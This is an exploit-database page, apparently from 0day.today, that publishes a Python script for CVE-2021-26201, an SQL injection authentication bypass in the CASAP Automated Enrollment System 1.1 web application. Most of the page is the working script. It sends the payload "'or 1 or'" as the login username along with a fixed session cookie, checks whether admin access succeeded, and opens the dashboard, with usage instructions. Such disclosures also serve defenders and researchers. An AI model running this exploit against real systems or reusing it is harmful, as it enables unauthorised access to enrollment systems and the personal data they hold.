[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

CASAP Automated Enrollment System 1.1 SQL Injection Exploit

Author
nu11secur1ty
Risk
[
Security Risk High
]
0day-ID
0day-ID-35889
Category
web applications
Date add
02-03-2021
CVE
CVE-2021-26201
Platform
php
# Exploit Title: CASAP Automated Enrollment System 1.1 - Authentication Bypass cookie session
# Exploit Author: @nu11secur1ty
# Vendor Homepage: https://www.sourcecodester.com/php/12210/casap-automated-enrollment-system.html
# Software Link:
https://www.sourcecodester.com/sites/default/files/download/Yna%20Ecole/final.zip
# Version: 1.1
# Tested On: Ubuntu + XAMPP 7.3.2
# Description: CASAP Automated Enrollment System 1.0 - Authentication
Bypass SQLi cookie session
# Exploit Link:
https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-26201
# More: https://www.nu11secur1ty.com/2021/03/cve-2021-26201.html

[Exploit]


import time
import sys
import requests
import webbrowser

# Creator of the idea: Himanshu Shukla
print("Author: @nu11secur1ty")

def authbypass(url):

  #Authentication Bypass
  s = requests.Session()
  #Set Cookie fot testing
  #PHPSESSID=3g6ghfl8i7qh190m4pq92fv262 #in my case from XSS attack
  cookies = {'PHPSESSID': 'inucrnag25j9h5hb826kovir0p'}

  print ("[*]Attempting Authentication Bypass cookie session...")
  time.sleep(1)

  values = {"username":"'or 1 or'","password":""}
  r=s.post(url+'login.php', data=values, cookies=cookies)
  p=s.get(url+'dashboard.php', cookies=cookies)

  #Check if Authentication was bypassed or not.
  logged_in = True if ("true_admin" in r.text) else False
  l=logged_in
  if l:
    print("[+]Authentication Bypass Successful...!")
  else:
    print("[-]Failed cookie Authentication exploit!")
    print("[-]Check Your URL")

if __name__ == "__main__":
  
  if len(sys.argv)!=2:
    print("You Haven't Provided any URL!")
    print("Usage : python3 exploit.py <URL>")
    print("Example : python3 exploit.py http://IP_or_domain/final/")
    exit()
  try:
    authbypass(sys.argv[1])
    webbrowser.open('http://10.10.10.100/final/dashboard.php')
  except:

    print("[-]Invalid URL!")
    exit()

# BR @nu11secur1ty

#  0day.today [2024-11-15]  #